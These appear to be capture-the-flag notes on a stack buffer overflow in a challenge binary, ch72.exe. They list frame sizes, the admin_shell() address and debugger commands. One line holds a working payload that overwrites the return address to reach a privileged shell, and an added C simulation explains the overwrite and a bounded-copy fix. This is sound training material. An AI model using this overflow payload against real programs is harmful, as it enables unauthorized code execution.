buff size = 16
i size = 4
ebp size = 4
admin_shell() addr = 0x00401000

Disassemble & get addresses :
objdump -d ch72.exe

Debug :
cdb32 -p

CDB Help :
dd addr : view mem
bp addr : set breakpoint
g : continue
p : step over

(printf "AAAAAAAAAAAAAAAABBBBCCCC\x00\x10\x40\x00"; cat -) | ./wrapper.sh
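
Added example, not part of the original notes: a C simulation of the frame layout these sizes imply, showing why bytes 24 to 27 of the input land on the saved return address and why a length-checked copy leaves it intact. The field order, the ORIGINAL_RET placeholder and all function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated frame built from the sizes in the notes (buff 16, i 4, ebp 4).
   Assumption: the fields sit in this order, as the input's layout suggests. */
struct frame {
    char          buff[16];
    unsigned char i[4];
    unsigned char saved_ebp[4];
    unsigned char ret[4];
};

#define ORIGINAL_RET 0x00401234u /* constructed placeholder for the legitimate return address */
#define INPUT_LEN    28u
/* Constructed copy of the input from the notes: 16 'A', "BBBB", "CCCC", address bytes. */
static const unsigned char INPUT[] = "AAAAAAAAAAAAAAAA" "BBBB" "CCCC" "\x00\x10\x40\x00";

/* Decode four bytes as a little-endian 32-bit value, as x86 stores addresses. */
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void init_frame(struct frame *f) {
    memset(f, 0, sizeof *f);
    for (int k = 0; k < 4; k++) f->ret[k] = (unsigned char)((ORIGINAL_RET >> (8 * k)) & 0xffu);
}

/* Models a copy with no length check: bytes run past buff into the neighbouring
   fields. Capped at the struct size so the simulation itself stays well defined. */
uint32_t ret_after_unchecked_copy(const unsigned char *in, size_t len) {
    struct frame f;
    init_frame(&f);
    memcpy(&f, in, len > sizeof f ? sizeof f : len);
    return le32(f.ret);
}

/* Length-checked copy: at most sizeof buff - 1 bytes plus a terminator. */
uint32_t ret_after_bounded_copy(const unsigned char *in, size_t len) {
    struct frame f;
    init_frame(&f);
    if (len > sizeof f.buff - 1) len = sizeof f.buff - 1;
    memcpy(f.buff, in, len);
    f.buff[len] = '\0';
    return le32(f.ret);
}

size_t ret_offset(void) { return offsetof(struct frame, ret); }

int main(void) {
    printf("ret offset: %zu\n", ret_offset());
    printf("unchecked : 0x%08x\n", (unsigned)ret_after_unchecked_copy(INPUT, INPUT_LEN));
    printf("bounded   : 0x%08x\n", (unsigned)ret_after_bounded_copy(INPUT, INPUT_LEN));
    return 0;
}
```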